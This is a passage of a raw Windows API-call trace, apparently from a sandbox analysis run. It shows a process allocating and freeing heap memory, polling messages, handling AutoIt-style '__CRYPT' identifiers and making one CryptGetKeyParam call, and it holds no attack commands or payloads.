(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.993] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.994] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.995] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.995] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.996] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0035.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.997] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.997] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.000] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.000] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.000] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.001] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.001] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.001] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.001] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0036.001] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, 